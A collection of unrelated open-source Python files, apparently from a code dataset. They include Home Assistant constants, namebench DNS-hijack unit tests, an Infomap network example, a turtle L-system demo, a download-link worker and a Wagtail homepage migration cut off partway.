EVENT_STATE_CHANGED = 'state_changed'
EVENT_TIME_CHANGED = 'time_changed'
EVENT_CALL_SERVICE = 'call_service'
EVENT_SERVICE_EXECUTED = 'service_executed'
EVENT_PLATFORM_DISCOVERED = 'platform_discovered'
EVENT_COMPONENT_LOADED = 'component_loaded'
EVENT_SERVICE_REGISTERED = 'service_registered'
EVENT_SERVICE_REMOVED = 'service_removed'
EVENT_LOGBOOK_ENTRY = 'logbook_entry'
EVENT_THEMES_UPDATED = 'themes_updated'
# #### STATES ####
STATE_ON = 'on'
STATE_OFF = 'off'
STATE_HOME = 'home'
STATE_NOT_HOME = 'not_home'
STATE_UNKNOWN = 'unknown'
STATE_OPEN = 'open'
STATE_OPENING = 'opening'
STATE_CLOSED = 'closed'
STATE_CLOSING = 'closing'
STATE_PLAYING = 'playing'
STATE_PAUSED = 'paused'
STATE_IDLE = 'idle'
STATE_STANDBY = 'standby'
STATE_ALARM_DISARMED = 'disarmed'
STATE_ALARM_ARMED_HOME = 'armed_home'
STATE_ALARM_ARMED_AWAY = 'armed_away'
STATE_ALARM_ARMED_NIGHT = 'armed_night'
STATE_ALARM_PENDING = 'pending'
STATE_ALARM_ARMING = 'arming'
STATE_ALARM_DISARMING = 'disarming'
STATE_ALARM_TRIGGERED = 'triggered'
STATE_LOCKED = 'locked'
STATE_UNLOCKED = 'unlocked'
STATE_UNAVAILABLE = 'unavailable'
STATE_OK = 'ok'
STATE_PROBLEM = 'problem'
# #### STATE AND EVENT ATTRIBUTES ####
# Attribution
ATTR_ATTRIBUTION = 'attribution'
# Contains time-related attributes
ATTR_NOW = 'now'
ATTR_DATE = 'date'
ATTR_TIME = 'time'
# Contains domain, service for a SERVICE_CALL event
ATTR_DOMAIN = 'domain'
ATTR_SERVICE = 'service'
ATTR_SERVICE_DATA = 'service_data'
# Data for a SERVICE_EXECUTED event
ATTR_SERVICE_CALL_ID = 'service_call_id'
# Contains one string or a list of strings, each being an entity id
ATTR_ENTITY_ID = 'entity_id'
# String with a friendly name for the entity
ATTR_FRIENDLY_NAME = 'friendly_name'
# A picture to represent entity
ATTR_ENTITY_PICTURE = 'entity_picture'
# Icon to use in the frontend
ATTR_ICON = 'icon'
# The unit of measurement if applicable
ATTR_UNIT_OF_MEASUREMENT = 'unit_of_measurement'
CONF_UNIT_SYSTEM_METRIC = 'metric' # type: str
CONF_UNIT_SYSTEM_IMPERIAL = 'imperial' # type: str
# Temperature attribute
ATTR_TEMPERATURE = 'temperature'
TEMP_CELSIUS = '°C'
TEMP_FAHRENHEIT = '°F'
# Length units
LENGTH_CENTIMETERS = 'cm' # type: str
LENGTH_METERS = 'm' # type: str
LENGTH_KILOMETERS = 'km' # type: str
LENGTH_INCHES = 'in' # type: str
LENGTH_FEET = 'ft' # type: str
LENGTH_YARD = 'yd' # type: str
LENGTH_MILES = 'mi' # type: str
# Volume units
VOLUME_LITERS = 'L' # type: str
VOLUME_MILLILITERS = 'mL' # type: str
VOLUME_GALLONS = 'gal' # type: str
VOLUME_FLUID_OUNCE = 'fl. oz.' # type: str
# Mass units
MASS_GRAMS = 'g' # type: str
MASS_KILOGRAMS = 'kg' # type: str
MASS_OUNCES = 'oz' # type: str
MASS_POUNDS = 'lb' # type: str
# Contains the information that is discovered
ATTR_DISCOVERED = 'discovered'
# Location of the device/sensor
ATTR_LOCATION = 'location'
ATTR_BATTERY_LEVEL = 'battery_level'
ATTR_WAKEUP = 'wake_up_interval'
# For devices which support a code attribute
ATTR_CODE = 'code'
ATTR_CODE_FORMAT = 'code_format'
# For calling a device specific command
ATTR_COMMAND = 'command'
# For devices which support an armed state
ATTR_ARMED = 'device_armed'
# For devices which support a locked state
ATTR_LOCKED = 'locked'
# For sensors that support 'tripping', e.g. motion and door sensors
ATTR_TRIPPED = 'device_tripped'
# For sensors that support 'tripping' this holds the most recent
# time the device was tripped
ATTR_LAST_TRIP_TIME = 'last_tripped_time'
# For all entities, this holds whether or not it should be hidden
ATTR_HIDDEN = 'hidden'
# Location of the entity
ATTR_LATITUDE = 'latitude'
ATTR_LONGITUDE = 'longitude'
# Accuracy of location in meters
ATTR_GPS_ACCURACY = 'gps_accuracy'
# If state is assumed
ATTR_ASSUMED_STATE = 'assumed_state'
ATTR_STATE = 'state'
ATTR_OPTION = 'option'
# Bitfield of supported component features for the entity
ATTR_SUPPORTED_FEATURES = 'supported_features'
# Class of device within its domain
ATTR_DEVICE_CLASS = 'device_class'
# #### SERVICES ####
SERVICE_HOMEASSISTANT_STOP = 'stop'
SERVICE_HOMEASSISTANT_RESTART = 'restart'
SERVICE_TURN_ON = 'turn_on'
SERVICE_TURN_OFF = 'turn_off'
SERVICE_TOGGLE = 'toggle'
SERVICE_RELOAD = 'reload'
SERVICE_VOLUME_UP = 'volume_up'
SERVICE_VOLUME_DOWN = 'volume_down'
SERVICE_VOLUME_MUTE = 'volume_mute'
SERVICE_VOLUME_SET = 'volume_set'
SERVICE_MEDIA_PLAY_PAUSE = 'media_play_pause'
SERVICE_MEDIA_PLAY = 'media_play'
SERVICE_MEDIA_PAUSE = 'media_pause'
SERVICE_MEDIA_STOP = 'media_stop'
SERVICE_MEDIA_NEXT_TRACK = 'media_next_track'
SERVICE_MEDIA_PREVIOUS_TRACK = 'media_previous_track'
SERVICE_MEDIA_SEEK = 'media_seek'
SERVICE_SHUFFLE_SET = 'shuffle_set'
SERVICE_ALARM_DISARM = 'alarm_disarm'
SERVICE_ALARM_ARM_HOME = 'alarm_arm_home'
SERVICE_ALARM_ARM_AWAY = 'alarm_arm_away'
SERVICE_ALARM_ARM_NIGHT = 'alarm_arm_night'
SERVICE_ALARM_TRIGGER = 'alarm_trigger'
SERVICE_LOCK = 'lock'
SERVICE_UNLOCK = 'unlock'
SERVICE_OPEN = 'open'
SERVICE_CLOSE = 'close'
SERVICE_CLOSE_COVER = 'close_cover'
SERVICE_CLOSE_COVER_TILT = 'close_cover_tilt'
SERVICE_OPEN_COVER = 'open_cover'
SERVICE_OPEN_COVER_TILT = 'open_cover_tilt'
SERVICE_SET_COVER_POSITION = 'set_cover_position'
SERVICE_SET_COVER_TILT_POSITION = 'set_cover_tilt_position'
SERVICE_STOP_COVER = 'stop_cover'
SERVICE_STOP_COVER_TILT = 'stop_cover_tilt'
SERVICE_SELECT_OPTION = 'select_option'
# #### API / REMOTE ####
SERVER_PORT = 8123
URL_ROOT = '/'
URL_API = '/api/'
URL_API_STREAM = '/api/stream'
URL_API_CONFIG = '/api/config'
URL_API_DISCOVERY_INFO = '/api/discovery_info'
URL_API_STATES = '/api/states'
URL_API_STATES_ENTITY = '/api/states/{}'
URL_API_EVENTS = '/api/events'
URL_API_EVENTS_EVENT = '/api/events/{}'
URL_API_SERVICES = '/api/services'
URL_API_SERVICES_SERVICE = '/api/services/{}/{}'
URL_API_COMPONENTS = '/api/components'
URL_API_ERROR_LOG = '/api/error_log'
URL_API_LOG_OUT = '/api/log_out'
URL_API_TEMPLATE = '/api/template'
HTTP_OK = 200
HTTP_CREATED = 201
HTTP_MOVED_PERMANENTLY = 301
HTTP_BAD_REQUEST = 400
HTTP_UNAUTHORIZED = 401
HTTP_NOT_FOUND = 404
HTTP_METHOD_NOT_ALLOWED = 405
HTTP_UNPROCESSABLE_ENTITY = 422
HTTP_INTERNAL_SERVER_ERROR = 500
HTTP_BASIC_AUTHENTICATION = 'basic'
HTTP_DIGEST_AUTHENTICATION = 'digest'
HTTP_HEADER_HA_AUTH = 'X-HA-access'
HTTP_HEADER_ACCEPT_ENCODING = 'Accept-Encoding'
HTTP_HEADER_CONTENT_TYPE = 'Content-type'
HTTP_HEADER_CONTENT_ENCODING = 'Content-Encoding'
HTTP_HEADER_VARY = 'Vary'
HTTP_HEADER_CONTENT_LENGTH = 'Content-Length'
HTTP_HEADER_CACHE_CONTROL = 'Cache-Control'
HTTP_HEADER_EXPIRES = 'Expires'
HTTP_HEADER_ORIGIN = 'Origin'
HTTP_HEADER_X_REQUESTED_WITH = 'X-Requested-With'
HTTP_HEADER_ACCEPT = 'Accept'
HTTP_HEADER_ACCESS_CONTROL_ALLOW_ORIGIN = 'Access-Control-Allow-Origin'
HTTP_HEADER_ACCESS_CONTROL_ALLOW_HEADERS = 'Access-Control-Allow-Headers'
ALLOWED_CORS_HEADERS = [HTTP_HEADER_ORIGIN, HTTP_HEADER_ACCEPT,
HTTP_HEADER_X_REQUESTED_WITH, HTTP_HEADER_CONTENT_TYPE,
HTTP_HEADER_HA_AUTH]
CONTENT_TYPE_JSON = 'application/json'
CONTENT_TYPE_MULTIPART = 'multipart/x-mixed-replace; boundary={}'
CONTENT_TYPE_TEXT_PLAIN = 'text/plain'
# The exit code to send to request a restart
RESTART_EXIT_CODE = 100
UNIT_NOT_RECOGNIZED_TEMPLATE = '{} is not a recognized {} unit.' # type: str
LENGTH = 'length' # type: str
MASS = 'mass' # type: str
VOLUME = 'volume' # type: str
TEMPERATURE = 'temperature' # type: str
SPEED_MS = 'speed_ms' # type: str
ILLUMINANCE = 'illuminance' # type: str
|
apache-2.0
|
when30/namebench
|
libnamebench/nameserver_test.py
|
175
|
7015
|
#!/usr/bin/env python
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Mocks for tests."""
__author__ = '[email protected] (Thomas Stromberg)'
import mocks
import nameserver
import unittest
class TestNameserver(unittest.TestCase):
def testInit(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
self.assertEquals(ns.ip, mocks.GOOD_IP)
self.assertEquals(ns.name, None)
ns = mocks.MockNameServer(mocks.NO_RESPONSE_IP, name='Broked')
self.assertEquals(ns.ip, mocks.NO_RESPONSE_IP)
self.assertEquals(ns.name, 'Broked')
def testTimedRequest(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(response, duration, exception) = ns.TimedRequest('A', 'www.paypal.com')
self.assertEquals(response.id, 999)
expected = ('www.paypal.com. 159 IN A 66.211.169.65\n'
'www.paypal.com. 159 IN A 66.211.169.2')
self.assertEquals(str(response.answer[0]), expected)
self.assertTrue(duration > 0)
self.assertEquals(exception, None)
def testTestAnswers(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(is_broken, warning, duration) = ns.TestAnswers('A', 'www.paypal.com',
'10.0.0.1')
self.assertEquals(is_broken, False)
self.assertEquals(warning, None)
self.assertTrue(duration > 0 and duration < 3600)
def testResponseToAscii(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(response, duration, exception) = ns.TimedRequest('A', 'www.paypal.com')
self.assertEquals(nameserver.ResponseToAscii(response),
'66.211.169.65 + 66.211.169.2')
response.answer = None
self.assertEquals(nameserver.ResponseToAscii(response), 'no answer')
def testGoogleComResponse(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(is_broken, warning, duration) = ns.TestGoogleComResponse()
self.assertEquals(is_broken, False)
self.assertEquals(warning,
'google.com. is hijacked (66.211.169.65 + 66.211.169.2)')
self.assertTrue(duration > 0 and duration < 3600)
def testWwwGoogleComResponse(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(is_broken, warning, duration) = ns.TestWwwGoogleComResponse()
self.assertEquals(is_broken, True)
self.assertEquals(warning, 'No answer')
self.assertTrue(duration > 0 and duration < 3600)
def testWwwPaypalComResponse(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(is_broken, warning, duration) = ns.TestWwwPaypalComResponse()
self.assertEquals(is_broken, False)
self.assertEquals(warning, None)
def testNegativeResponse(self):
ns = mocks.MockNameServer(mocks.NO_RESPONSE_IP)
(is_broken, warning, duration) = ns.TestNegativeResponse()
self.assertEquals(is_broken, False)
self.assertEquals(warning, None)
def testNegativeResponseHijacked(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(is_broken, warning, duration) = ns.TestNegativeResponse()
self.assertEquals(is_broken, False)
self.assertEquals(warning,
'NXDOMAIN Hijacking (66.211.169.65 + 66.211.169.2)')
def testNegativeResponseBroken(self):
ns = mocks.MockNameServer(mocks.BROKEN_IP)
(is_broken, warning, duration) = ns.TestNegativeResponse()
self.assertEquals(is_broken, True)
self.assertEquals(warning, 'BadResponse')
def testWildcardCache(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
(response, is_broken, warning, duration) = ns.QueryWildcardCache()
self.assertEquals(is_broken, False)
question = str(response.question[0])
self.assertTrue(question.startswith('namebench'))
self.assertEquals(warning, None)
def testCheckHealthGood(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
ns.CheckHealth()
self.assertEquals(ns.CheckHealth(), False)
self.assertEquals(ns.warnings, ['No answer'])
self.assertEquals(len(ns.checks), 1)
self.assertEquals(ns.failure[0], 'TestWwwGoogleComResponse')
self.assertEquals(ns.checks[0][0:3],
('TestWwwGoogleComResponse', True, 'No answer'))
def testCheckHealthPerfect(self):
ns = mocks.MockNameServer(mocks.PERFECT_IP)
ns.CheckHealth()
self.assertEquals(ns.CheckHealth(), True)
expected = ['www.google.com. is hijacked (66.211.169.65 + 66.211.169.2)',
'google.com. is hijacked (66.211.169.65 + 66.211.169.2)',
'NXDOMAIN Hijacking (66.211.169.65 + 66.211.169.2)']
self.assertEquals(ns.warnings, expected)
self.assertEquals(len(ns.checks), 5)
self.assertEquals(ns.failure, None)
self.assertTrue(ns.check_duration > 10)
def testQueryWildcardCacheSaving(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
other_ns = mocks.MockNameServer(mocks.PERFECT_IP)
ns.QueryWildcardCache(save=True)
other_ns.QueryWildcardCache(save=True)
# Test our cache-sharing mechanisms
(hostname, ttl) = ns.cache_check
self.assertTrue(hostname.startswith('namebench'))
self.assertEquals(ttl, 159)
(other_hostname, other_ttl) = other_ns.cache_check
self.assertTrue(other_hostname.startswith('namebench'))
self.assertNotEqual(hostname, other_hostname)
self.assertEquals(other_ttl, 159)
def testSharedCacheNoMatch(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
other_ns = mocks.MockNameServer(mocks.PERFECT_IP)
ns.QueryWildcardCache(save=True)
other_ns.QueryWildcardCache(save=True)
(shared, slower, faster) = ns.TestSharedCache(other_ns)
self.assertEquals(shared, False)
self.assertEquals(slower, None)
self.assertEquals(faster, None)
def testSharedCacheMatch(self):
ns = mocks.MockNameServer(mocks.GOOD_IP)
other_ns = mocks.MockNameServer(mocks.PERFECT_IP)
ns.QueryWildcardCache(save=True)
other_ns.QueryWildcardCache(save=True)
# Increase the TTL of 'other'
other_ns.cache_check = (other_ns.cache_check[0], other_ns.cache_check[1] + 5)
(shared, slower, faster) = ns.TestSharedCache(other_ns)
self.assertEquals(shared, True)
self.assertEquals(slower.ip, mocks.GOOD_IP)
self.assertEquals(faster.ip, mocks.PERFECT_IP)
# Increase the TTL of 'other' by a whole lot
other_ns.cache_check = (other_ns.cache_check[0], other_ns.cache_check[1] + 3600)
(shared, slower, faster) = ns.TestSharedCache(other_ns)
self.assertEquals(shared, False)
self.assertEquals(slower, None)
self.assertEquals(faster, None)
if __name__ == '__main__':
unittest.main()
|
apache-2.0
|
mapequation/infomap
|
examples/python/infomap-networkx.py
|
1
|
2219
|
#!/usr/bin/env python
import networkx as nx
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import pathlib
import infomap
"""
Generate and draw a network with NetworkX, colored
according to the community structure found by Infomap.
"""
def find_communities(G):
"""
Partition network with the Infomap algorithm.
Annotates nodes with 'community' id.
"""
im = infomap.Infomap("--two-level")
print("Building Infomap network from a NetworkX graph...")
im.add_networkx_graph(G)
print("Find communities with Infomap...")
im.run()
print(f"Found {im.num_top_modules} modules with codelength: {im.codelength}")
communities = im.get_modules()
nx.set_node_attributes(G, communities, 'community')
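# A short usage sketch (assuming find_communities(G) above has already run):
#   module_of = nx.get_node_attributes(G, 'community')
#   # module_of[0] would then give the Infomap module id of node 0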
def draw_network(G):
# position map
pos = nx.spring_layout(G)
# community index
communities = [c - 1 for c in nx.get_node_attributes(G, 'community').values()]
num_communities = max(communities) + 1
# color map from http://colorbrewer2.org/
cmap_light = colors.ListedColormap(
['#a6cee3', '#b2df8a', '#fb9a99', '#fdbf6f', '#cab2d6'], 'indexed', num_communities)
cmap_dark = colors.ListedColormap(
['#1f78b4', '#33a02c', '#e31a1c', '#ff7f00', '#6a3d9a'], 'indexed', num_communities)
# edges
nx.draw_networkx_edges(G, pos)
# nodes
node_collection = nx.draw_networkx_nodes(
G, pos=pos, node_color=communities, cmap=cmap_light)
# set node border color to the darker shade
dark_colors = [cmap_dark(v) for v in communities]
node_collection.set_edgecolor(dark_colors)
# Print node labels separately instead
for n in G.nodes:
plt.annotate(n,
xy=pos[n],
textcoords='offset points',
horizontalalignment='center',
verticalalignment='center',
xytext=[0, 2],
color=cmap_dark(communities[n]))
plt.axis('off')
pathlib.Path("output").mkdir(exist_ok=True)
print("Writing network figure to output/karate.png")
plt.savefig("output/karate.png")
# plt.show()
G = nx.karate_club_graph()
find_communities(G)
draw_network(G)
|
agpl-3.0
|
chouseknecht/openshift-restclient-python
|
openshift/test/test_v1_cluster_resource_quota.py
|
1
|
4299
|
# coding: utf-8
"""
OpenShift API (with Kubernetes)
OpenShift provides builds, application lifecycle, image content management, and administrative policy on top of Kubernetes. The API allows consistent management of those objects. All API operations are authenticated via an Authorization bearer token that is provided for service accounts as a generated secret (in JWT form) or via the native OAuth endpoint located at /oauth/authorize. Core infrastructure components may use openshift.client certificates that require no authentication. All API operations return a 'resourceVersion' string that represents the version of the object in the underlying storage. The standard LIST operation performs a snapshot read of the underlying objects, returning a resourceVersion representing a consistent version of the listed objects. The WATCH operation allows all updates to a set of objects after the provided resourceVersion to be observed by a openshift.client. By listing and beginning a watch from the returned resourceVersion, openshift.clients may observe a consistent view of the state of one or more objects. Note that WATCH always returns the update after the provided resourceVersion. Watch may be extended a limited time in the past - using etcd 2 the watch window is 1000 events (which on a large cluster may only be a few tens of seconds) so openshift.clients must explicitly handle the \"watch to old error\" by re-listing. Objects are divided into two rough categories - those that have a lifecycle and must reflect the state of the cluster, and those that have no state. Objects with lifecycle typically have three main sections: * 'metadata' common to all objects * a 'spec' that represents the desired state * a 'status' that represents how much of the desired state is reflected on the cluster at the current time Objects that have no state have 'metadata' but may lack a 'spec' or 'status' section. Objects are divided into those that are namespace scoped (only exist inside of a namespace) and those that are cluster scoped (exist outside of a namespace). A namespace scoped resource will be deleted when the namespace is deleted and cannot be created if the namespace has not yet been created or is in the process of deletion. Cluster scoped resources are typically only accessible to admins - resources like nodes, persistent volumes, and cluster policy. All objects have a schema that is a combination of the 'kind' and 'apiVersion' fields. This schema is additive only for any given version - no backwards incompatible changes are allowed without incrementing the apiVersion. The server will return and accept a number of standard responses that share a common schema - for instance, the common error type is 'metav1.Status' (described below) and will be returned on any error from the API server. The API is available in multiple serialization formats - the default is JSON (Accept: application/json and Content-Type: application/json) but openshift.clients may also use YAML (application/yaml) or the native Protobuf schema (application/vnd.kubernetes.protobuf). Note that the format of the WATCH API call is slightly different - for JSON it returns newline delimited objects while for Protobuf it returns length-delimited frames (4 bytes in network-order) that contain a 'versioned.Watch' Protobuf object. See the OpenShift documentation at https://docs.openshift.org for more information.
OpenAPI spec version: latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import openshift.client
from kubernetes.client.rest import ApiException
from openshift.client.models.v1_cluster_resource_quota import V1ClusterResourceQuota
class TestV1ClusterResourceQuota(unittest.TestCase):
""" V1ClusterResourceQuota unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1ClusterResourceQuota(self):
"""
Test V1ClusterResourceQuota
"""
# FIXME: construct object with mandatory attributes with example values
#model = openshift.client.models.v1_cluster_resource_quota.V1ClusterResourceQuota()
pass
if __name__ == '__main__':
unittest.main()
|
apache-2.0
|
TNT-Samuel/Coding-Projects
|
DNS Server/Source - Copy/Lib/turtledemo/lindenmayer.py
|
164
|
2434
|
#!/usr/bin/env python3
""" turtle-example-suite:
xtx_lindenmayer_indian.py
Each morning women in Tamil Nadu, in southern
India, place designs, created by using rice
flour and known as kolam on the thresholds of
their homes.
These can be described by Lindenmayer systems,
which can easily be implemented with turtle
graphics and Python.
Two examples are shown here:
(1) the snake kolam
(2) anklets of Krishna
Taken from Marcia Ascher: Mathematics
Elsewhere, An Exploration of Ideas Across
Cultures
"""
################################
# Mini Lindenmayer tool
###############################
from turtle import *
def replace( seq, replacementRules, n ):
for i in range(n):
newseq = ""
for element in seq:
newseq = newseq + replacementRules.get(element,element)
seq = newseq
return seq
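# A tiny worked example of the rewriting step above (hypothetical rules, not
# part of the original demo): replace("ab", {"a": "ab", "b": "a"}, 2)
# expands "ab" -> "aba" -> "abaab".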
def draw( commands, rules ):
for b in commands:
try:
rules[b]()
except TypeError:
try:
draw(rules[b], rules)
except:
pass
def main():
################################
# Example 1: Snake kolam
################################
def r():
right(45)
def l():
left(45)
def f():
forward(7.5)
snake_rules = {"-":r, "+":l, "f":f, "b":"f+f+f--f--f+f+f"}
snake_replacementRules = {"b": "b+f+b--f--b+f+b"}
snake_start = "b--f--b--f"
drawing = replace(snake_start, snake_replacementRules, 3)
reset()
speed(3)
tracer(1,0)
ht()
up()
backward(195)
down()
draw(drawing, snake_rules)
from time import sleep
sleep(3)
################################
# Example 2: Anklets of Krishna
################################
def A():
color("red")
circle(10,90)
def B():
from math import sqrt
color("black")
l = 5/sqrt(2)
forward(l)
circle(l, 270)
forward(l)
def F():
color("green")
forward(10)
krishna_rules = {"a":A, "b":B, "f":F}
krishna_replacementRules = {"a" : "afbfa", "b" : "afbfbfbfa" }
krishna_start = "fbfbfbfb"
reset()
speed(0)
tracer(3,0)
ht()
left(45)
drawing = replace(krishna_start, krishna_replacementRules, 3)
draw(drawing, krishna_rules)
tracer(1)
return "Done!"
if __name__=='__main__':
msg = main()
print(msg)
mainloop()
|
gpl-3.0
|
kunovg/pldownload
|
workers/linkgenerator.py
|
1
|
2225
|
import logging
from queue import Queue
from threading import Thread
from linkgenerators.soundcloud import ScDownloader
from linkgenerators.vubey import Vubey
from linkgenerators.youtubemp3org import Mp3Org
from linkgenerators.youtubetomp3cc import Mp3Cc
from linkgenerators.onlinevideoconverter import Ovc
from linkgenerators.twoconv import TwoConv
from linkgenerators.convert2mp3 import ConvertToMp3
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class LinkGenerator(Thread):
def __init__(self, idsqueue, linksqueue, maxtime, sc_client_id):
Thread.__init__(self)
self.idsqueue = idsqueue
self.linksqueue = linksqueue
self.maxtime = maxtime
self.sc_client_id = sc_client_id
def run(self):
while True:
obj = self.idsqueue.get()
tempqueue = Queue()
if obj.get('youtube_id'):
threads = [
# Deprecated
# Mp3Cc(tempqueue, obj['youtube_id'], self.maxtime),
# Mp3Org(tempqueue, obj['youtube_id'], self.maxtime),
# Vubey(tempqueue, obj['youtube_id'], self.maxtime),
Ovc(tempqueue, obj['youtube_id'], self.maxtime),
TwoConv(tempqueue, obj['youtube_id'], self.maxtime),
ConvertToMp3(tempqueue, obj['youtube_id'], self.maxtime),
]
elif obj.get('sc_permalink'):
threads = [ScDownloader(tempqueue, obj['sc_permalink'], self.sc_client_id, self.maxtime)]
for th in threads:
th.daemon = True
th.start()
try:
res = tempqueue.get(True, self.maxtime)
# self.linksqueue.put({**obj, **{'link': link, 'not_dummy': True}})
self.linksqueue.put({**obj, **res})
except:
# obj['playlist_queue'].put(False)
# self.linksqueue.put(obj)
self.linksqueue.put({**obj, **{'link': None}})
logging.warning('No method could obtain the link in less than {} seconds'.format(self.maxtime))
self.idsqueue.task_done()
|
mit
|
osvalr/odoo
|
addons/account_followup/wizard/__init__.py
|
437
|
1076
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_followup_print
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
willcodefortea/wagtail
|
wagtail/project_template/core/migrations/0002_create_homepage.py
|
3
|
7165
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models, connection
from django.db.transaction import set_autocommit
class Migration(DataMigration):
depends_on = (
('wagtailcore', '0002_initial_data'),
)
def forwards(self, orm):
if connection.vendor == 'sqlite':
set_autocommit(True)
orm['wagtailcore.Page'].objects.get(id=2).delete()
homepage_content_type, created = orm['contenttypes.contenttype'].objects.get_or_create(
model='homepage', app_label='core', defaults={'name': 'Homepage'})
homepage = orm['core.HomePage'].objects.create(
title="Homepage",
slug='home',
content_type=homepage_content_type,
path='00010001',
depth=2,
numchild=0,
url_path='/home/',
)
orm['wagtailcore.site'].objects.create(
hostname='localhost', root_page=homepage, is_default_site=True)
def backwards(self, orm):
pass
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'user_set'", 'blank': 'True', 'to': "orm['auth.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'user_set'", 'blank': 'True', 'to': "orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.homepage': {
'Meta': {'object_name': 'HomePage', '_ormbases': ['wagtailcore.Page']},
'page_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['wagtailcore.Page']", 'unique': 'True', 'primary_key': 'True'})
},
'wagtailcore.page': {
'Meta': {'object_name': 'Page'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pages'", 'to': "orm['contenttypes.ContentType']"}),
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'expire_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'expired': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'go_live_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'has_unpublished_changes': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'live': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'owned_pages'", 'null': 'True', 'to': "orm['auth.User']"}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'search_description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'seo_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'show_in_menus': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
